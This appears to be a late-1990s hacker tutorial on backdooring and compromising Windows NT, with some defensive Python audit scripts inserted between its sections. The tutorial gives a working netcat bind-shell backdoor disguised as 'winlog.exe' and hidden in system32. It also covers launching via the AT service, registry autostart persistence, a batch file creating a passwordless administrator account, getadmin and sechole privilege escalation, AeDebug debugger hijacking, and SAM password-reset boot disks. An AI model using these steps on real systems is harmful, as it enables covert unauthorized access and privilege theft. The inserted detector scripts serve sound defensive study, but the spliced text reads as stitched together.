Creating backdoors is how you can ensure your ability to return to the system at will. This is almost a black art when dealing with Un*x systems, and it can also be done on NT. netcat, from Weld Pond, takes advantage of any user's ability to use a local port. netcat is a command-line utility that has several switches used to configure its operation. This makes netcat, combined with a properly configured command line launched from a batch file, an excellent choice for a backdoor. (Get netcat for NT from http://www.l0pht.com/weld)

The batch file needs to contain:

nc -L -d -p [port] -t -e cmd.exe

-L   tells netcat to keep listening after the current session terminates
-d   detach - don't open a DOS window when running (IMPORTANT)
-p   which port to bind to
-t   enable telnet negotiations
-e   command to execute upon connection

Copy this command line into a batch file named "runnc.bat" or something similar. Then copy both the netcat executable file and the batch file to a directory that is in the PATH on the target machine...c:\winnt\system32\ is a good place to hide them.

Another little trick to keep in mind is to rename the netcat executable from 'nc.exe' to something innocuous, like 'winlog.exe' (and make sure to make the appropriate changes to the batch file). That way, when you or your buddy opens the TaskList, there won't seem to be any 'unusual' programs running. Run the batch file on your own machine, and open the TaskList (right-click on the TaskBar, and choose TaskList)...

Once this batch file is run, all you need to do is connect via telnet, or netcat in client mode:

c:\>nc -v [ipaddress of target] [port]

So how do you run this batch file? By default, NT doesn't have an interactive telnet server installed so that you can just log in, so what do you do? Well, there is a great little service called the Schedule (or 'AT') service, which lets you schedule programs to be run at a later date.
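Renaming the executable defeats an eyeball check of the TaskList, but not a check of the port: a listener started with -L -p [port] shows up in 'netstat -an' no matter what the binary is called. The following Python script is an added example (not part of the original text, and not part of netcat) that parses netstat -an output and flags TCP listeners that are not on a per-host baseline, together with any sessions currently established to them. The sample output, the baseline ports and the addresses in it are constructed for the example.

```python
"""Flag unexpected TCP listeners in 'netstat -an' output.

Added example, not from the original article: compare every LISTENING
port against a baseline of ports this host is supposed to serve and
report the rest, together with who is currently connected to them.
"""
import re

# Constructed sample in the layout 'netstat -an' prints on NT 4 (assumed).
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:139            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:31337          0.0.0.0:0              LISTENING
  TCP    192.168.1.5:139        192.168.1.9:1031       ESTABLISHED
  TCP    192.168.1.5:31337      10.0.0.77:2049         ESTABLISHED
  UDP    0.0.0.0:137            *:*
  UDP    0.0.0.0:138            *:*
"""

# Ports this particular host is expected to listen on (constructed
# baseline: RPC endpoint mapper and NetBIOS session service).  Tailor per host.
BASELINE_TCP_PORTS = {135, 139}

LINE_RE = re.compile(
    r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+(\S+):(\S+)(?:\s+(\S+))?\s*$"
)


def parse_netstat(text):
    """Return rows of (proto, local_ip, local_port, remote_ip, remote_port, state)."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # header and blank lines
        proto, lip, lport, rip, rport, state = m.groups()
        rows.append((proto, lip, int(lport), rip, rport, state or ""))
    return rows


def audit_listeners(text, baseline=BASELINE_TCP_PORTS):
    """Return {port: [peer, ...]} for TCP listeners not in the baseline.

    Each peer is 'ip:port' of an ESTABLISHED session to that listener,
    i.e. who is connected to the suspicious port right now.
    """
    rows = parse_netstat(text)
    suspicious = {}
    for proto, _lip, lport, _rip, _rport, state in rows:
        if proto == "TCP" and state == "LISTENING" and lport not in baseline:
            suspicious[lport] = []
    for proto, _lip, lport, rip, rport, state in rows:
        if proto == "TCP" and state == "ESTABLISHED" and lport in suspicious:
            suspicious[lport].append(f"{rip}:{rport}")
    return suspicious


if __name__ == "__main__":
    for port, peers in sorted(audit_listeners(SAMPLE_NETSTAT).items()):
        print(f"unexpected TCP listener on port {port}; peers: {peers or 'none'}")
```

Run it against saved output (netstat -an > ports.txt, then read the file in place of SAMPLE_NETSTAT); an unexpected port with a live peer is the combination worth chasing first, since it tells you both where the listener is and who is using it.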
To see if your Schedule service is running, you can either click Control Panel -> Services, and check it, or if you have Perl installed (see above), you can run the following script to see if the service is running, and if not, start it:

----- begin script -----
# atchk.plx
# Script checks to see if AT service is running on local
# machine...if not, starts it. Minor modifications will
# allow you to do the same thing on a remote machine, once
# you have successfully completed the IPC$ connection and have
# Administrator rights.
#
# usage: perl atchk.plx
use strict;
use Win32::Service;
use Win32;

my %status;
# an empty host name means the local machine
Win32::Service::GetStatus('', 'Schedule', \%status);
# CurrentState 4 is SERVICE_RUNNING
die "service is already started\n" if ($status{CurrentState} == 4);
Win32::Service::StartService(Win32::NodeName(), 'Schedule')
    || die "Can't start service\n";
print "Service started\n";
#**Note: This script was modified from:
#http://www.inforoute.cgs.fr/leberre1/perlser.htm
----- end script -----

Note: Only Administrators or members of the Administrators group can run the AT command.

Once installed, the 'runnc.bat' file can be executed via the AT command. The necessary syntax for the AT command is:

AT [\\computername] [time] "command"

or more particularly:

AT [\\computername] [time] runnc.bat

References to commands can be hidden in various places within the registry, set to run when a user logs in:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

Note: This last key is where you will find things like AOL's Instant Messenger. The install puts the reference to the app there, but you won't find it in your StartUp box...

Here's another little exercise that you should run on your own machine first, and then try copying it over to a friend's machine and running it via the AT command.
The batch file below uses commands that are native to NT to create a new user account, then make that user a member of the Administrators group:

----- begin batch file -----
@echo off
net user Admin /add /expires:never /passwordreq:no
net localgroup "Administrators" /add Admin
net localgroup "Users" /del Admin
----- end batch file -----

What are some other neat little tricks to try? Get Netbus from http://netbus.hypermart.net/ . This little program is similar to Back Orifice, and it runs on NT. (Visit the makers of Back Orifice at http://www.cultdeadcow.com/)

Okay, so you and your 'leet buddies have played around with each other's machines via the Internet, and pretty much walked through the exercises listed above. Now, what are some local 'attacks' that you can run against your own machine?

[Local Attacks]

Let's say you have a couple of accounts on your NT box, at least one with Admin rights, and one or two others with user rights. You've already run through the password cracking exercise and seen how easy it is to get the 'SAM._' file and crack it. So what else can you do? Well, you can try the 'getadmin' exploit. This exploit consists of a program and a .dll file that will add the user to the Administrators group. Get the necessary files from:

http://www.nmrc.org/files/nt/index.html

The Microsoft site has a hotfix for the "getadmin" exploit, located at:

ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/nt40/hotfixes-postSP3/getadmin-fix/

General information on security problems addressed by Microsoft can be found at:

http://www.microsoft.com/security/issues.htm

For more information on the 'getadmin' exploit, go to http://www.ntsecurity.net and search for 'getadmin'.

All you need to do to test this exploit is log onto your system via a user account, copy the files into a directory, and run getadmin.exe.

Another local exploit similar to the "getadmin" exploit has popped up.
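The account-creation batch file above leaves two traces that NT's own 'net' command reports: a new member in the Administrators local group, and an account whose 'Password required' flag is No. The following Python script is an added example (not from the original text) that parses the text output of 'net localgroup Administrators' and 'net user <name>' and reports both conditions against a baseline of expected administrators. The sample outputs, the dates in them and the baseline are constructed for the example.

```python
"""Spot accounts added to Administrators with no password required.

Added example, not from the original article.  Parses the output of
'net localgroup Administrators' and 'net user <name>' (layout as NT 4
prints it, assumed) and reports members outside a baseline plus any
administrator whose account does not require a password.
"""
import re

# Constructed sample of 'net localgroup Administrators'.
SAMPLE_LOCALGROUP = """\
Alias name     Administrators
Comment        Members can fully administer the computer/domain

Members

-------------------------------------------------------------------------------
Admin
Administrator
The command completed successfully.
"""

# Constructed sample of 'net user Admin'.
SAMPLE_NET_USER = """\
User name                    Admin
Full Name
Comment
Account active               Yes
Account expires              Never

Password last set            6/3/98 10:12 PM
Password expires             Never
Password required            No
User may change password     Yes

Local Group Memberships      *Administrators
Global Group memberships     *None
The command completed successfully.
"""

# Constructed baseline: the only account that should be a local admin here.
BASELINE_ADMINS = {"Administrator"}


def parse_localgroup_members(text):
    """Return the member names listed after the dashed separator line."""
    members, in_list = [], False
    for line in text.splitlines():
        if line.startswith("-----"):
            in_list = True
            continue
        if not in_list or line.startswith("The command completed"):
            continue
        # net prints several names per line in columns; split on 2+ spaces
        members.extend(n for n in re.split(r"\s{2,}", line.strip()) if n)
    return members


def parse_net_user(text):
    """Return {field: value} from 'net user <name>' output."""
    fields = {}
    for line in text.splitlines():
        parts = re.split(r"\s{2,}", line.rstrip(), maxsplit=1)
        if len(parts) == 2:
            fields[parts[0]] = parts[1]
        elif parts[0] and not parts[0].startswith("The command"):
            fields[parts[0]] = ""  # field present but empty, e.g. Full Name
    return fields


def audit_admins(localgroup_text, user_details, baseline=BASELINE_ADMINS):
    """Return (finding, account) pairs.

    user_details maps an account name to its 'net user <name>' output.
    """
    findings = []
    for member in parse_localgroup_members(localgroup_text):
        if member not in baseline:
            findings.append(("unexpected administrator", member))
        details = parse_net_user(user_details.get(member, ""))
        if details.get("Password required") == "No":
            findings.append(("administrator without password requirement", member))
    return findings


if __name__ == "__main__":
    for finding, account in audit_admins(SAMPLE_LOCALGROUP, {"Admin": SAMPLE_NET_USER}):
        print(f"{finding}: {account}")
```

The same two parsers work on any local group, so the check extends to Backup Operators or Server Operators by changing the group name in the command you capture and the baseline you compare against.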
The exploit works like this: the user runs a program called "sechole.exe" and the final result (possibly after a reboot) is that the user now has administrator rights! For more information on this and the zipped archive "sechole.zip", go to:

http://www.technotronic.com/microsoft.html

A variation on this exploit involves the Registry setting that determines the default debugger (the program run when a user-mode program crashes). Usually, the setting is:

Hive:          HKEY_LOCAL_MACHINE
Key:           \Software\Microsoft\Windows NT\CurrentVersion\AeDebug
Value:         Debugger
Data Type:     REG_SZ
Default Value: drwtsn32 -p %ld -e %ld -g

The "Everyone" group has the ability to set the value of this key, and that is essentially how you can exploit it. The debugger runs in the security context of the crashed application, so all you need to do is change the Default Value (via 'regedit') to point to the User Manager, and then crash one of the services that are running. Then you can add accounts in the User Manager...even to the Administrators group.

*******************************************************************
NEWBIE NOTE: Before any changes are made to the Registry, make sure that you make a backup of your current Registry using the "rdisk /s" utility. You can make changes to the Registry by clicking Start -> Run, and entering either 'regedit' or 'regedt32'. Before you attempt any of this, read the files pertaining to the Registry from the Rhino9 site (http://207.89.195.250/texts/), the "Hacker's Modern Desk Reference" (http://www.antionline.com/SpecialReports/MHD/) and even "Hardening NT" (http://pw2.netcom.com/~honeyluv/index.html).
*******************************************************************

Another local exploit that you can attempt uses the NTFSDOS utility, which is nothing more than a bootable DOS diskette that can read (but not write to) NTFS partitions. This would potentially allow an attacker to make off with copies of system files, including the SAM database.
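The Run/RunServices keys listed earlier and the AeDebug Debugger value described above are both plain string values, so they can be exported with regedit and checked offline against what the machine is supposed to contain. The following Python script is an added example (not from the original text) that parses the REGEDIT4 export format and applies two checks: every value under the autostart keys must be on a per-host allow-list, and the Debugger value must still equal the Dr. Watson default shown above. The sample export, the allow-list entries and the file paths in it are constructed; the parser handles string values only and skips hex and dword data.

```python
"""Audit autostart keys and the AeDebug debugger in a regedit export.

Added example, not from the original article.  Parses the REGEDIT4 text
format ('regedit /e file.reg <key>' on NT 4), then checks the Run /
RunServices values against an allow-list and the AeDebug Debugger value
against the Dr. Watson default.
"""
import re

AUTOSTART_KEYS = (
    r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run",
    r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices",
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
)
AEDEBUG_KEY = r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AeDebug"
AEDEBUG_DEFAULT = "drwtsn32 -p %ld -e %ld -g"

# Constructed sample export: the 'winlog' entry stands for the renamed
# netcat launcher from the text, and the Debugger value has been altered.
SAMPLE_REG = r'''REGEDIT4

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"SystemTray"="SysTray.Exe"
"winlog"="c:\\winnt\\system32\\runnc.bat"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"AIM"="C:\\Program Files\\AOL\\aim.exe"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AeDebug]
"Auto"="1"
"Debugger"="c:\\temp\\not-a-debugger.exe -p %ld -e %ld"
'''

# Constructed per-host allow-list of (key, value name) pairs known to be legitimate.
ALLOWED = {
    (AUTOSTART_KEYS[0], "SystemTray"),
    (AUTOSTART_KEYS[2], "AIM"),
}

KEY_RE = re.compile(r"^\[(.+)\]$")
# "name"="value"  or  @="value"  (default value); hex:/dword: lines don't match
STR_RE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|(@))=("(?:[^"\\]|\\.)*")$')


def _unescape(s):
    """REGEDIT4 escapes backslash and quote with a backslash."""
    return re.sub(r"\\(.)", r"\1", s)


def parse_reg(text):
    """Parse REGEDIT4 text into {key: {value_name: string_value}}."""
    tree, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = KEY_RE.match(line)
        if m:
            current = m.group(1)
            tree.setdefault(current, {})
            continue
        m = STR_RE.match(line)
        if m and current is not None:
            name = "@" if m.group(2) else _unescape(m.group(1))
            tree[current][name] = _unescape(m.group(3)[1:-1])
    return tree


def audit(tree, allowed=ALLOWED):
    """Return (kind, key, name, value) findings for the two checks."""
    findings = []
    for key in AUTOSTART_KEYS:
        for name, value in sorted(tree.get(key, {}).items()):
            if (key, name) not in allowed:
                findings.append(("unlisted autostart", key, name, value))
    debugger = tree.get(AEDEBUG_KEY, {}).get("Debugger")
    if debugger is not None and debugger != AEDEBUG_DEFAULT:
        findings.append(("non-default debugger", AEDEBUG_KEY, "Debugger", debugger))
    return findings


if __name__ == "__main__":
    for kind, key, name, value in audit(parse_reg(SAMPLE_REG)):
        print(f"{kind}: [{key}] {name} = {value}")
```

Because 'Everyone' can write the AeDebug value, the debugger check belongs in a routine audit rather than a one-off; restricting write access on that key with regedt32 is the fix the text's NEWBIE NOTE leads toward, and the audit tells you whether it has already been abused.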
The folks at Systems Internals (http://www.sysinternals.com) have not only an NTFSDOS utility available, but also some tools that give the user limited write capability. SysInternals also has NTRecover and NTLocksmith, along with a variety of other useful tools. Get a copy of the utility, and try booting your own system with the diskette in the A:\ drive.

There is a nifty little utility available, one that is essentially a Linux boot disk:

http://home.eunet.no/~pnordahl/ntpasswd/bootdisk.html

The utility comes with rawrite.exe, so that DOS and Windows users can download the utility and create the Linux boot disk. The utility is a minimal bootable Linux kernel with NTFS support, plus a small program that allows the user to change any password in the SAM database. Alternatively, you can find the Linux binary file (without the rawrite.exe utility) at:

http://www.nmrc.org/files/snt/index.html

It is called bootdisk.bin, and according to the description, this is the file you are interested in. You will still need to get a copy of rawrite.exe in order to write the information to a diskette in a usable form. Carefully read the instructions on the web page for the utility (listed above) and if you are feeling especially '31337', try it out against your own system.

[Final Words]

By now you should be familiar with some of the methods used to attack and compromise an NT system. Hopefully, you have seen fit to try out the exercises on your own system, or against a friend's system (with permission, of course). And it should start becoming clear what it takes to secure a system from attack. The first step is to become familiar with various exploits by regularly visiting such sites as RootShell (http://www.rootshell.com), the ISS X-Force site (http://www.iss.net/xforce), NTSecurity (http://www.ntsecurity.net), and NTBugTraq (http://www.ntbugtraq.com).
Then go to the Microsoft Support (http://support.microsoft.com) and Security (http://www.microsoft.com/security) sites to see what the 'official' fixes are...the NTBugTraq site does a great job of keeping track of the latest hotfixes, and which ones are obsolete. The Microsoft Support site is especially useful, because you can search for information or specific KnowledgeBase articles, and print out those that you find useful. The "Hardening NT" document from Santeria Systems (http://pw2.netcom.com/~honeyluv/index.html) provides an excellent guide for protecting your system, complete with references to the appropriate KnowledgeBase article for each step. Finally, Microsoft maintains a list of security bulletins at:

http://www.microsoft.com/security

Sir Pent.
Vice-Prezident [UHA]
"The Net is my Playground"